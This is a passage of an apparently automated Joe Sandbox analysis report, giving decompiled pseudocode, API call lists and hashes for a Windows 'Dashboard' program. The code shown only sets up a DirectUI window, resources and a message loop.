                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								L18:
                                                                                                                    								_t169 = 0x8000ffff;
                                                                                                                    								goto L46;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					_push(0x30);
                                                                                                                    					L01008948();
                                                                                                                    					_t166 = _t95;
                                                                                                                    					 *((intOrPtr*)(_t175 - 0x22c)) = _t166;
                                                                                                                    					 *(_t175 - 4) = 2;
                                                                                                                    					if(_t166 == 0) {
                                                                                                                    						_t95 = 0;
                                                                                                                    					} else {
                                                                                                                    						__imp__??0CRMDUIParser@@QAE@XZ();
                                                                                                                    					}
                                                                                                                    					 *(_t175 - 4) = 1;
                                                                                                                    					 *((intOrPtr*)(_t174 + 0x2c)) = _t95;
                                                                                                                    					if(_t95 != 0) {
                                                                                                                    						goto L9;
                                                                                                                    					} else {
                                                                                                                    						_t169 = 0x8007000e;
                                                                                                                    						goto L46;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    			}































                                                                                                                    0x010128a6
                                                                                                                    0x010128ab
                                                                                                                    0x010128b0
                                                                                                                    0x010128b2
                                                                                                                    0x010128b8
                                                                                                                    0x010128be
                                                                                                                    0x010128c4
                                                                                                                    0x010128ca
                                                                                                                    0x010128cd
                                                                                                                    0x010128d2
                                                                                                                    0x010128db
                                                                                                                    0x010128df
                                                                                                                    0x01012c69
                                                                                                                    0x00000000
                                                                                                                    0x010128ed
                                                                                                                    0x010128f1
                                                                                                                    0x010128f4
                                                                                                                    0x010128f8
                                                                                                                    0x01012c72
                                                                                                                    0x01012c72
                                                                                                                    0x01012c77
                                                                                                                    0x01012c7c
                                                                                                                    0x01012c8c
                                                                                                                    0x01012c8f
                                                                                                                    0x01012c92
                                                                                                                    0x01012c92
                                                                                                                    0x01012c97
                                                                                                                    0x01012c9c
                                                                                                                    0x01012ca4
                                                                                                                    0x01012cac
                                                                                                                    0x01012cb3
                                                                                                                    0x01012cb3
                                                                                                                    0x01012cb9
                                                                                                                    0x01012cc0
                                                                                                                    0x01012cc5
                                                                                                                    0x01012cc8
                                                                                                                    0x01012cce
                                                                                                                    0x01012cd3
                                                                                                                    0x01012cd9
                                                                                                                    0x01012cdf
                                                                                                                    0x01012ce4
                                                                                                                    0x01012ce4
                                                                                                                    0x01012cee
                                                                                                                    0x01012cee
                                                                                                                    0x01012901
                                                                                                                    0x0101293a
                                                                                                                    0x01012941
                                                                                                                    0x01012951
                                                                                                                    0x01012957
                                                                                                                    0x01012959
                                                                                                                    0x01012963
                                                                                                                    0x01012973
                                                                                                                    0x01012976
                                                                                                                    0x01012979
                                                                                                                    0x0101297e
                                                                                                                    0x0101297e
                                                                                                                    0x01012985
                                                                                                                    0x00000000
                                                                                                                    0x0101298b
                                                                                                                    0x0101298b
                                                                                                                    0x01012999
                                                                                                                    0x010129a7
                                                                                                                    0x010129c3
                                                                                                                    0x010129c9
                                                                                                                    0x010129cb
                                                                                                                    0x010129d5
                                                                                                                    0x010129e5
                                                                                                                    0x010129e8
                                                                                                                    0x010129eb
                                                                                                                    0x010129f0
                                                                                                                    0x010129f0
                                                                                                                    0x010129f7
                                                                                                                    0x00000000
                                                                                                                    0x010129fd
                                                                                                                    0x010129fd
                                                                                                                    0x01012a02
                                                                                                                    0x01012a0a
                                                                                                                    0x01012a19
                                                                                                                    0x01012a20
                                                                                                                    0x01012a28
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012a31
                                                                                                                    0x01012a39
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012a49
                                                                                                                    0x01012a50
                                                                                                                    0x01012a5a
                                                                                                                    0x01012a5f
                                                                                                                    0x01012a62
                                                                                                                    0x01012a68
                                                                                                                    0x01012a78
                                                                                                                    0x01012a7f
                                                                                                                    0x01012a7f
                                                                                                                    0x01012a89
                                                                                                                    0x01012a8e
                                                                                                                    0x01012aa0
                                                                                                                    0x01012aaf
                                                                                                                    0x01012ab6
                                                                                                                    0x01012ab6
                                                                                                                    0x01012abc
                                                                                                                    0x01012ac7
                                                                                                                    0x01012ac9
                                                                                                                    0x01012ad0
                                                                                                                    0x01012ad6
                                                                                                                    0x01012ad8
                                                                                                                    0x01012ae2
                                                                                                                    0x01012af2
                                                                                                                    0x01012af5
                                                                                                                    0x01012af8
                                                                                                                    0x01012afd
                                                                                                                    0x01012afd
                                                                                                                    0x01012b04
                                                                                                                    0x00000000
                                                                                                                    0x01012b0a
                                                                                                                    0x01012b10
                                                                                                                    0x01012b15
                                                                                                                    0x01012b19
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012b27
                                                                                                                    0x01012b2c
                                                                                                                    0x01012b30
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012b41
                                                                                                                    0x01012b46
                                                                                                                    0x01012b4a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012b5b
                                                                                                                    0x01012b60
                                                                                                                    0x01012b64
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012b72
                                                                                                                    0x01012b77
                                                                                                                    0x01012b7b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012b90
                                                                                                                    0x01012b92
                                                                                                                    0x01012b96
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012ba8
                                                                                                                    0x01012bad
                                                                                                                    0x01012bb1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012bbf
                                                                                                                    0x01012bc4
                                                                                                                    0x01012bc8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012bd7
                                                                                                                    0x01012be3
                                                                                                                    0x01012be7
                                                                                                                    0x01012bed
                                                                                                                    0x01012bf1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012bff
                                                                                                                    0x01012c05
                                                                                                                    0x01012c09
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012c14
                                                                                                                    0x01012c1a
                                                                                                                    0x01012c20
                                                                                                                    0x01012c24
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012c26
                                                                                                                    0x01012c32
                                                                                                                    0x01012c3a
                                                                                                                    0x01012c42
                                                                                                                    0x01012c52
                                                                                                                    0x01012c56
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012c62
                                                                                                                    0x01012c6e
                                                                                                                    0x01012c70
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01012c70
                                                                                                                    0x01012c44
                                                                                                                    0x00000000
                                                                                                                    0x01012c44
                                                                                                                    0x01012b04
                                                                                                                    0x01012a0c
                                                                                                                    0x01012a0c
                                                                                                                    0x00000000
                                                                                                                    0x01012a0c
                                                                                                                    0x010129f7
                                                                                                                    0x01012985
                                                                                                                    0x01012903
                                                                                                                    0x01012905
                                                                                                                    0x0101290b
                                                                                                                    0x0101290d
                                                                                                                    0x01012915
                                                                                                                    0x01012919
                                                                                                                    0x01012923
                                                                                                                    0x0101291b
                                                                                                                    0x0101291b
                                                                                                                    0x0101291b
                                                                                                                    0x01012927
                                                                                                                    0x0101292b
                                                                                                                    0x0101292e
                                                                                                                    0x00000000
                                                                                                                    0x01012930
                                                                                                                    0x01012930
                                                                                                                    0x00000000
                                                                                                                    0x01012930
                                                                                                                    0x0101292e

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 010128A6
                                                                                                                      • Part of subcall function 0100C9C9: TlsGetValue.KERNEL32(703B38B8,010128D2,00000224,0100C14A,00000001,Main,?,?,?,?,?,?,?,00000000), ref: 0100C9D0
                                                                                                                    • ?StartDefer@Element@DirectUI@@SGXXZ.UXCORE(00000224,0100C14A,00000001,Main,?,?,?,?,?,?,?,00000000), ref: 010128D2
                                                                                                                    • ??2@YAPAXI@Z.MSVCR80 ref: 01012905
                                                                                                                    • ??0CRMDUIParser@@QAE@XZ.UXCORE ref: 0101291B
                                                                                                                    • ?LoadAndCreateElement@CRMDUIParser@@QAEJIPB_WPAPAVElement@DirectUI@@PAV23@K0@Z.UXCORE(?,?,?,00000000,0000000F,00000000), ref: 01012951
                                                                                                                    • GetForegroundWindow.USER32(6C744143,65637845,0000000D,01003450,00000000), ref: 0101298B
                                                                                                                    • ?Initialize@NativeHWNDHost@DirectUI@@QAEJPB_W0PAUHWND__@@PAUHICON__@@HHHHHHHPAUHINSTANCE__@@I@Z.UXCORE(00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 010129C3
                                                                                                                    • ?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ.UXCORE(6C744143,65637845,0000000E,01003450,00000000), ref: 01012A02
                                                                                                                    • ?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ.UXCORE(00000000), ref: 01012A19
                                                                                                                    • GetSystemMenu.USER32(00000000), ref: 01012A20
                                                                                                                    • RemoveMenu.USER32(00000000,0000F000,00000000), ref: 01012A31
                                                                                                                    • ?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ.UXCORE(?,00000000,00000000,00000000,00000000,00000013), ref: 01012A49
                                                                                                                    • SetWindowPos.USER32(00000000), ref: 01012A50
                                                                                                                    • ?RMLoadIcon@@YGPAUHICON__@@PB_WK0@Z.UXCORE(?,0000000F,00000000), ref: 01012A68
                                                                                                                    • ?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ.UXCORE(00000080,00000001,00000000), ref: 01012A78
                                                                                                                    • SendMessageW.USER32(00000000), ref: 01012A7F
                                                                                                                    • ?RMLoadString@@YGIIPA_WIKPB_W@Z.UXCORE(00000000,?,00000104,0000000F,00000000), ref: 01012AA0
                                                                                                                    • ?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ.UXCORE(?), ref: 01012AAF
                                                                                                                    • SetWindowTextW.USER32(00000000), ref: 01012AB6
                                                                                                                    • ?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ.UXCORE(00000001,00000000,00000000,?), ref: 01012AC9
                                                                                                                    • ?Create@HWNDElement@DirectUI@@SGJPAUHWND__@@_NI1PAPAVElement@2@@Z.UXCORE(00000000), ref: 01012AD0
                                                                                                                      • Part of subcall function 010126C4: ?CreateInt@Value@DirectUI@@SGPAV12@H@Z.UXCORE(?,00000000,?,?,01012B77,00000009,Direct UI window,DUI Window Frame,00000001,?), ref: 010126D0
                                                                                                                      • Part of subcall function 01012756: ?CreateUnknown@Value@DirectUI@@SGPAV12@PAUIUnknown@@@Z.UXCORE(?,00000000,?,?,01012BAD,?,?,01004488,?,00000009,Direct UI window,DUI Window Frame,00000001,?), ref: 01012762
                                                                                                                      • Part of subcall function 0100C840: ?CreateBool@Value@DirectUI@@SGPAV12@_N@Z.UXCORE(?,00000000,?,?,01012BC4,00000001,?,?,01004488,?,00000009,Direct UI window,DUI Window Frame,00000001,?), ref: 0100C84C
                                                                                                                    • ?Host@NativeHWNDHost@DirectUI@@QAEXPAVElement@2@@Z.UXCORE(?,00000001,?,?,01004488,?,00000009,Direct UI window,DUI Window Frame,00000001,?), ref: 01012BD7
                                                                                                                    • ?AddListener@Element@DirectUI@@QAEJPAUIElementListener@2@@Z.UXCORE(?,?,01004488,?,00000009,Direct UI window,DUI Window Frame,00000001,?), ref: 01012BE7
                                                                                                                    • ?Add@Element@DirectUI@@QAEJPAV12@@Z.UXCORE(?,?,01004488,?,00000009,Direct UI window,DUI Window Frame,00000001,?), ref: 01012BFF
                                                                                                                    • ?Attach@CRMDUIParser@@QAEJPAVElement@DirectUI@@@Z.UXCORE(?,?,01004488,?,00000009,Direct UI window,DUI Window Frame,00000001,?), ref: 01012C1A
                                                                                                                    • ?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ.UXCORE(?,01004488,?,00000009,Direct UI window,DUI Window Frame,00000001,?), ref: 01012C32
                                                                                                                    • BuildDropTarget.UXCORE(00000001,00000000,?,01004488,?,00000009,Direct UI window,DUI Window Frame,00000001,?), ref: 01012C3A
                                                                                                                    • ?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ.UXCORE(6C744143,65637845,00000010,01003450,80070057), ref: 01012C9C
                                                                                                                    • ?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ.UXCORE(00000010,00000000,00000000), ref: 01012CAC
                                                                                                                    • PostMessageW.USER32(00000000), ref: 01012CB3
                                                                                                                    • ?EndDefer@Element@DirectUI@@SGXXZ.UXCORE(?), ref: 01012CC8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Direct$Host@$Native$D__@@$Element@$Create$LoadParser@@Value@Window$Defer@Element@2@@MenuMessageN__@@V12@$??2@Add@Attach@Bool@BuildCreate@D__@@_DropE__@@ElementForegroundH_prolog3_I@@@Icon@@Initialize@Int@Listener@Listener@2@@PostRemoveSendStartString@@SystemTargetTextUnknown@Unknown@@@V12@@V12@_V23@Value
                                                                                                                    • String ID: DUI Window Frame$Direct UI window
                                                                                                                    • API String ID: 3618921266-1775726735
                                                                                                                    • Opcode ID: 03c51ac8d8785a96ccd103557a71e794eee43199353ba1f3dd90f38f468ad6f3
                                                                                                                    • Instruction ID: 64156be431880ffba6556d0ffe67c253a3f4e7088df3ab75dac641eaba58ca07
                                                                                                                    • Opcode Fuzzy Hash: 03c51ac8d8785a96ccd103557a71e794eee43199353ba1f3dd90f38f468ad6f3
                                                                                                                    • Instruction Fuzzy Hash: CEC1F671600109AFDB26AFA4D98CEAD7BE6BB48340F254498F2C6D7295CB3ADD41CF11
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 70%
                                                                                                                    			E0100769A(void* __edx, void* __eflags, char _a4) {
                                                                                                                    				void* _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				char _v16;
                                                                                                                    				void* _v20;
                                                                                                                    				char _v24;
                                                                                                                    				struct tagMSG _v52;
                                                                                                                    				void* __ebx;
                                                                                                                    				void* __edi;
                                                                                                                    				void* __esi;
                                                                                                                    				void* __ebp;
                                                                                                                    				void* _t76;
                                                                                                                    				void* _t83;
                                                                                                                    				void* _t89;
                                                                                                                    				intOrPtr _t92;
                                                                                                                    				intOrPtr _t97;
                                                                                                                    				intOrPtr _t102;
                                                                                                                    				signed char _t106;
                                                                                                                    				signed char _t107;
                                                                                                                    				intOrPtr* _t110;
                                                                                                                    				intOrPtr* _t117;
                                                                                                                    				intOrPtr _t142;
                                                                                                                    				intOrPtr _t143;
                                                                                                                    				intOrPtr _t144;
                                                                                                                    				intOrPtr _t145;
                                                                                                                    				intOrPtr _t146;
                                                                                                                    				void* _t149;
                                                                                                                    				intOrPtr* _t150;
                                                                                                                    				intOrPtr* _t152;
                                                                                                                    				void* _t158;
                                                                                                                    
                                                                                                                    				_t158 = __eflags;
                                                                                                                    				_t149 = __edx;
                                                                                                                    				_t76 = GetProcessHeap();
                                                                                                                    				_t150 = __imp__HeapSetInformation;
                                                                                                                    				 *_t150(_t76, 1, 0, 0);
                                                                                                                    				_v24 = 2;
                                                                                                                    				 *_t150(GetProcessHeap(), 0,  &_v24, 4);
                                                                                                                    				_push( *0x101a28c);
                                                                                                                    				_v12 = 0;
                                                                                                                    				E0100653B(0,  &_v16, _t150, GetProcessHeap, _t158);
                                                                                                                    				_push( &_v16);
                                                                                                                    				_t83 = E010072FA(0, _t149, _t150, GetProcessHeap, _t158);
                                                                                                                    				_t131 = _v16 + 0xfffffff0;
                                                                                                                    				_v20 = _t83;
                                                                                                                    				E01004925(_v16 + 0xfffffff0, _t149);
                                                                                                                    				if(_v20 == 0) {
                                                                                                                    					L43:
                                                                                                                    					return _v12;
                                                                                                                    				}
                                                                                                                    				if(GetLastError() == 0xb7) {
                                                                                                                    					L42:
                                                                                                                    					CloseHandle(_v20);
                                                                                                                    					goto L43;
                                                                                                                    				}
                                                                                                                    				 *0x101a574 = _a4;
                                                                                                                    				_t89 = E01006C6E(0x101a550);
                                                                                                                    				 *0x101a570 = 0x100160c;
                                                                                                                    				 *0x101a004 = 0x101a550;
                                                                                                                    				E01006D3E(_t89, _t131, L"WLXS\\Dashboard");
                                                                                                                    				E01004D33( &_a4, 0x101a5f0);
                                                                                                                    				_t92 =  *0x101a004; // 0x101a004
                                                                                                                    				if(_t92 != 0x101a004) {
                                                                                                                    					_t162 =  *(_t92 + 0x1c) & 0x00000008;
                                                                                                                    					if(( *(_t92 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    						_t14 = _t92 + 0x14; // 0x65637845
                                                                                                                    						_t15 = _t92 + 0x10; // 0x6c744143
                                                                                                                    						E010049DE(_t92,  *_t15,  *_t14, 0xa, 0x10017f8);
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				_push( &_v8);
                                                                                                                    				E010061C3(0x10017f8,  &_a4, E01007529(0x10017f8, _t149, _t150, 0x101a004, _t162));
                                                                                                                    				E01004925(_v8 + 0xfffffff0, _t149);
                                                                                                                    				_t97 =  *0x101a004; // 0x101a004
                                                                                                                    				if(_t97 != 0x101a004) {
                                                                                                                    					_t164 =  *(_t97 + 0x1c) & 0x00000008;
                                                                                                                    					if(( *(_t97 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    						_t23 = _t97 + 0x14; // 0x65637845
                                                                                                                    						_t24 = _t97 + 0x10; // 0x6c744143
                                                                                                                    						E01006C01( *_t24,  *_t23, 0xb, 0x10017f8, _a4);
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				_push( &_v8);
                                                                                                                    				E010061C3(0x10017f8,  &_a4, E0100737C(0x10017f8, _t149, _t150, 0x101a004, _t164));
                                                                                                                    				E01004925(_v8 + 0xfffffff0, _t149);
                                                                                                                    				_t102 =  *0x101a004; // 0x101a004
                                                                                                                    				if(_t102 != 0x101a004 && ( *(_t102 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    					_t32 = _t102 + 0x14; // 0x65637845
                                                                                                                    					_t33 = _t102 + 0x10; // 0x6c744143
                                                                                                                    					E01006C01( *_t33,  *_t32, 0xc, 0x10017f8, _a4);
                                                                                                                    				}
                                                                                                                    				_t103 = E01004CB5( &_a4);
                                                                                                                    				__imp__CoInitializeEx(0, 2);
                                                                                                                    				if(_t103 < 0) {
                                                                                                                    					L41:
                                                                                                                    					E01006D8C(_t103);
                                                                                                                    					E01004925(_a4 + 0xfffffff0, _t149);
                                                                                                                    					goto L42;
                                                                                                                    				} else {
                                                                                                                    					__imp__?RMInitialize@@YGXXZ();
                                                                                                                    					_t152 = __imp__?RMUpdateResourceSet@@YG_NPB_WK00@Z;
                                                                                                                    					_t106 =  *_t152(L"DashboardRes", 8, 0, 0);
                                                                                                                    					_t142 =  *0x101a004; // 0x101a004
                                                                                                                    					if(_t142 != 0x101a004 && ( *(_t142 + 0x1c) & 0x00000010) != 0) {
                                                                                                                    						_t38 = _t142 + 0x14; // 0x65637845
                                                                                                                    						_t39 = _t142 + 0x10; // 0x6c744143
                                                                                                                    						E010090EF( *_t39,  *_t38, 0xd, 0x10017f8, _t106 & 0x000000ff);
                                                                                                                    					}
                                                                                                                    					_t107 =  *_t152(L"DashboardLoc", 4, L"1.0.0.1", 0);
                                                                                                                    					_t143 =  *0x101a004; // 0x101a004
                                                                                                                    					if(_t143 != 0x101a004 && ( *(_t143 + 0x1c) & 0x00000010) != 0) {
                                                                                                                    						_t43 = _t143 + 0x14; // 0x65637845
                                                                                                                    						_t44 = _t143 + 0x10; // 0x6c744143
                                                                                                                    						E010090EF( *_t44,  *_t43, 0xe, 0x10017f8, _t107 & 0x000000ff);
                                                                                                                    					}
                                                                                                                    					_t103 =  *_t152(L"hc", 0x8002, 0, 0);
                                                                                                                    					_t144 =  *0x101a004; // 0x101a004
                                                                                                                    					if(_t144 != 0x101a004 && ( *(_t144 + 0x1c) & 0x00000010) != 0) {
                                                                                                                    						_t48 = _t144 + 0x14; // 0x65637845
                                                                                                                    						_t49 = _t144 + 0x10; // 0x6c744143
                                                                                                                    						_t103 = E010090EF( *_t49,  *_t48, 0xf, 0x10017f8, _t103 & 0x000000ff);
                                                                                                                    					}
                                                                                                                    					_push(0);
                                                                                                                    					L01008E1A();
                                                                                                                    					if(_t103 < 0) {
                                                                                                                    						_t145 =  *0x101a004; // 0x101a004
                                                                                                                    						__eflags = _t145 - 0x101a004;
                                                                                                                    						if(_t145 != 0x101a004) {
                                                                                                                    							__eflags =  *(_t145 + 0x1c) & 0x00000010;
                                                                                                                    							if(( *(_t145 + 0x1c) & 0x00000010) != 0) {
                                                                                                                    								_t69 = _t145 + 0x14; // 0x65637845
                                                                                                                    								_t70 = _t145 + 0x10; // 0x6c744143
                                                                                                                    								_t103 = E010090EF( *_t70,  *_t69, 0x11, 0x10017f8, _t103);
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						_t71 =  &_v12;
                                                                                                                    						 *_t71 = _v12 | 0xffffffff;
                                                                                                                    						__eflags =  *_t71;
                                                                                                                    						goto L40;
                                                                                                                    					} else {
                                                                                                                    						L01008E0E();
                                                                                                                    						if(_t103 < 0) {
                                                                                                                    							_t146 =  *0x101a004; // 0x101a004
                                                                                                                    							__eflags = _t146 - 0x101a004;
                                                                                                                    							if(_t146 != 0x101a004) {
                                                                                                                    								__eflags =  *(_t146 + 0x1c) & 0x00000010;
                                                                                                                    								if(( *(_t146 + 0x1c) & 0x00000010) != 0) {
                                                                                                                    									_t62 = _t146 + 0x14; // 0x65637845
                                                                                                                    									_t63 = _t146 + 0x10; // 0x6c744143
                                                                                                                    									_t103 = E010090EF( *_t63,  *_t62, 0x10, 0x10017f8, _t103);
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							_t64 =  &_v12;
                                                                                                                    							 *_t64 = _v12 | 0xffffffff;
                                                                                                                    							__eflags =  *_t64;
                                                                                                                    							L35:
                                                                                                                    							L01008DF6();
                                                                                                                    							L40:
                                                                                                                    							__imp__?RMTerminate@@YGXXZ();
                                                                                                                    							__imp__CoUninitialize();
                                                                                                                    							goto L41;
                                                                                                                    						}
                                                                                                                    						_v8 = 0;
                                                                                                                    						if(E01007C06(_t144,  &_v8) >= 0) {
                                                                                                                    							_t117 = _v8;
                                                                                                                    							 *((intOrPtr*)( *_t117 + 0x10))(_t117);
                                                                                                                    						}
                                                                                                                    						_t110 = _v8;
                                                                                                                    						if(_t110 != 0) {
                                                                                                                    							 *((intOrPtr*)( *_t110 + 8))(_t110);
                                                                                                                    						}
                                                                                                                    						while(GetMessageW( &_v52, 0, 0, 0) != 0) {
                                                                                                                    							TranslateMessage( &_v52);
                                                                                                                    							DispatchMessageW( &_v52);
                                                                                                                    						}
                                                                                                                    						L01008E02();
                                                                                                                    						goto L35;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    			}
































                                                                                                                    0x0100769a
                                                                                                                    0x0100769a
                                                                                                                    0x010076b1
                                                                                                                    0x010076b3
                                                                                                                    0x010076ba
                                                                                                                    0x010076c3
                                                                                                                    0x010076cd
                                                                                                                    0x010076cf
                                                                                                                    0x010076d8
                                                                                                                    0x010076db
                                                                                                                    0x010076e3
                                                                                                                    0x010076e4
                                                                                                                    0x010076ec
                                                                                                                    0x010076ef
                                                                                                                    0x010076f2
                                                                                                                    0x010076fa
                                                                                                                    0x01007985
                                                                                                                    0x0100798c
                                                                                                                    0x0100798c
                                                                                                                    0x0100770b
                                                                                                                    0x0100797c
                                                                                                                    0x0100797f
                                                                                                                    0x00000000
                                                                                                                    0x0100797f
                                                                                                                    0x01007714
                                                                                                                    0x0100771f
                                                                                                                    0x01007729
                                                                                                                    0x01007733
                                                                                                                    0x01007739
                                                                                                                    0x01007746
                                                                                                                    0x0100774b
                                                                                                                    0x0100775c
                                                                                                                    0x0100775e
                                                                                                                    0x01007762
                                                                                                                    0x01007767
                                                                                                                    0x0100776a
                                                                                                                    0x0100776d
                                                                                                                    0x0100776d
                                                                                                                    0x01007762
                                                                                                                    0x01007775
                                                                                                                    0x0100777f
                                                                                                                    0x0100778a
                                                                                                                    0x0100778f
                                                                                                                    0x01007796
                                                                                                                    0x01007798
                                                                                                                    0x0100779c
                                                                                                                    0x010077a4
                                                                                                                    0x010077a7
                                                                                                                    0x010077aa
                                                                                                                    0x010077aa
                                                                                                                    0x0100779c
                                                                                                                    0x010077b2
                                                                                                                    0x010077bc
                                                                                                                    0x010077c7
                                                                                                                    0x010077cc
                                                                                                                    0x010077d3
                                                                                                                    0x010077e1
                                                                                                                    0x010077e4
                                                                                                                    0x010077e7
                                                                                                                    0x010077e7
                                                                                                                    0x010077ef
                                                                                                                    0x010077f9
                                                                                                                    0x01007801
                                                                                                                    0x0100796c
                                                                                                                    0x0100796c
                                                                                                                    0x01007977
                                                                                                                    0x00000000
                                                                                                                    0x01007807
                                                                                                                    0x01007807
                                                                                                                    0x0100780f
                                                                                                                    0x0100781c
                                                                                                                    0x0100781e
                                                                                                                    0x01007826
                                                                                                                    0x01007835
                                                                                                                    0x01007838
                                                                                                                    0x0100783b
                                                                                                                    0x0100783b
                                                                                                                    0x0100784e
                                                                                                                    0x01007850
                                                                                                                    0x01007858
                                                                                                                    0x01007867
                                                                                                                    0x0100786a
                                                                                                                    0x0100786d
                                                                                                                    0x0100786d
                                                                                                                    0x01007880
                                                                                                                    0x01007882
                                                                                                                    0x0100788a
                                                                                                                    0x01007899
                                                                                                                    0x0100789c
                                                                                                                    0x0100789f
                                                                                                                    0x0100789f
                                                                                                                    0x010078a6
                                                                                                                    0x010078a7
                                                                                                                    0x010078ae
                                                                                                                    0x0100793d
                                                                                                                    0x01007943
                                                                                                                    0x01007945
                                                                                                                    0x01007947
                                                                                                                    0x0100794b
                                                                                                                    0x01007951
                                                                                                                    0x01007954
                                                                                                                    0x01007957
                                                                                                                    0x01007957
                                                                                                                    0x0100794b
                                                                                                                    0x0100795c
                                                                                                                    0x0100795c
                                                                                                                    0x0100795c
                                                                                                                    0x00000000
                                                                                                                    0x010078b4
                                                                                                                    0x010078b4
                                                                                                                    0x010078bb
                                                                                                                    0x01007913
                                                                                                                    0x01007919
                                                                                                                    0x0100791b
                                                                                                                    0x0100791d
                                                                                                                    0x01007921
                                                                                                                    0x01007927
                                                                                                                    0x0100792a
                                                                                                                    0x0100792d
                                                                                                                    0x0100792d
                                                                                                                    0x01007921
                                                                                                                    0x01007932
                                                                                                                    0x01007932
                                                                                                                    0x01007932
                                                                                                                    0x01007936
                                                                                                                    0x01007936
                                                                                                                    0x01007960
                                                                                                                    0x01007960
                                                                                                                    0x01007966
                                                                                                                    0x00000000
                                                                                                                    0x01007966
                                                                                                                    0x010078c1
                                                                                                                    0x010078cb
                                                                                                                    0x010078cd
                                                                                                                    0x010078d3
                                                                                                                    0x010078d3
                                                                                                                    0x010078d6
                                                                                                                    0x010078db
                                                                                                                    0x010078e0
                                                                                                                    0x010078e0
                                                                                                                    0x010078ff
                                                                                                                    0x010078ef
                                                                                                                    0x010078f9
                                                                                                                    0x010078f9
                                                                                                                    0x0100790c
                                                                                                                    0x00000000
                                                                                                                    0x0100790c
                                                                                                                    0x010078ae

                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.KERNEL32(00000001,00000000,00000000), ref: 010076B1
                                                                                                                    • HeapSetInformation.KERNEL32(00000000), ref: 010076BA
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000004), ref: 010076CA
                                                                                                                    • HeapSetInformation.KERNEL32(00000000), ref: 010076CD
                                                                                                                      • Part of subcall function 0100653B: __EH_prolog3.LIBCMT ref: 01006542
                                                                                                                      • Part of subcall function 010072FA: __EH_prolog3.LIBCMT ref: 01007301
                                                                                                                      • Part of subcall function 010072FA: CreateMutexW.KERNEL32(00000000,00000000,?,?,?,00000004,010076E9,?), ref: 01007343
                                                                                                                      • Part of subcall function 010072FA: GetLastError.KERNEL32 ref: 0100734F
                                                                                                                      • Part of subcall function 010072FA: CloseHandle.KERNEL32(00000000), ref: 0100735D
                                                                                                                    • GetLastError.KERNEL32(?), ref: 01007700
                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?), ref: 010077F9
                                                                                                                    • ?RMInitialize@@YGXXZ.UXCORE ref: 01007807
                                                                                                                    • ?RMUpdateResourceSet@@YG_NPB_WK00@Z.UXCORE(DashboardRes,00000008,00000000,00000000), ref: 0100781C
                                                                                                                    • ?RMUpdateResourceSet@@YG_NPB_WK00@Z.UXCORE(DashboardLoc,00000004,1.0.0.1,00000000), ref: 0100784E
                                                                                                                    • ?RMUpdateResourceSet@@YG_NPB_WK00@Z.UXCORE(01001AD0,00008002,00000000,00000000), ref: 01007880
                                                                                                                    • UXCoreInitProcess.UXCORE(00000000), ref: 010078A7
                                                                                                                    • UXCoreInitThread.UXCORE(00000000), ref: 010078B4
                                                                                                                    • TranslateMessage.USER32(?), ref: 010078EF
                                                                                                                    • DispatchMessageW.USER32 ref: 010078F9
